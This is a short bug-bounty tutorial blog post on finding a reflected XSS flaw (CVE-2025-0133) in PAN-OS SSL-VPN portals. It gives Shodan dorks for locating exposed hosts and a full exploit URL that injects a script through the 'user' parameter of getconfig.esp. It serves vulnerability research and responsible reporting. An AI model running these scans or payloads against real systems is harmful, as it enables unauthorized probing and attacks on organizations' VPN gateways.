Sitemap

How I Found XSS — CVE-2025–0133 Using Shodan

2 min readJun 26, 2025

--

👋 Hey Everyone!

First of all, thank you so much for the support on my previous articles. 🙏
I know my English isn’t perfect, but I’m genuinely trying to share my experiences in bug hunting to help others — especially beginners. So please ignore small mistakes and focus on the value. 😊

🐞 Today’s Topic: Finding XSS (CVE-2025–0133) using Shodan

If you’re struggling with XSS vulnerabilities, this post might help you!
⚠️ I’m not going to explain what is XSS — because if you’re into bug bounty, you probably already know that. 😉

So let’s jump straight into the practical part!

🎯 Step 1: Pick a Wildcard Domain

Example:

*.target.com

🧠 Step 2: Use Shodan Queries

Use these Shodan dorks to hunt for vulnerable domains running PAN-OS:

os:"PAN-OS" ssl.cert.subject.CN:"target.com"
hostname:target.com os:"PAN-OS"

Open any listed domain in your browser.

💥 Step 3: Test with XSS Payload

Use a payload like this:

/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
http://target.com/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=(empty_domain)&computer=computer

If the site reflects the user parameter without sanitization — boom! XSS! 🎉

📸 Make a PoC & Report It

In my case — it was valid and accepted

🔽 Bonus Tip:

  • 🧠 Read Medium articles regularly
  • 🐦 Follow XSS researchers on X (Twitter)
  • 🔍 Watch for PAN-OS or SSL-VPN endpoints in Shodan
  • 💬 Support & Connect

If you found this guide useful:

Leave a like/clap

Share with fellow bug hunters

Comment your thoughts or questions below

U can Check out my Linkedin Profile

Also, feel free to join my telegram channel for more bug hunting tips.
I’ll be happy to share more. 🙌

Happy Hunting 🐞🔎
— Everyone

--

--

Ch4ndan das
Ch4ndan das

Written by Ch4ndan das

Bug hunt3r | Penetration tester | Ethical Hack3r

No responses yet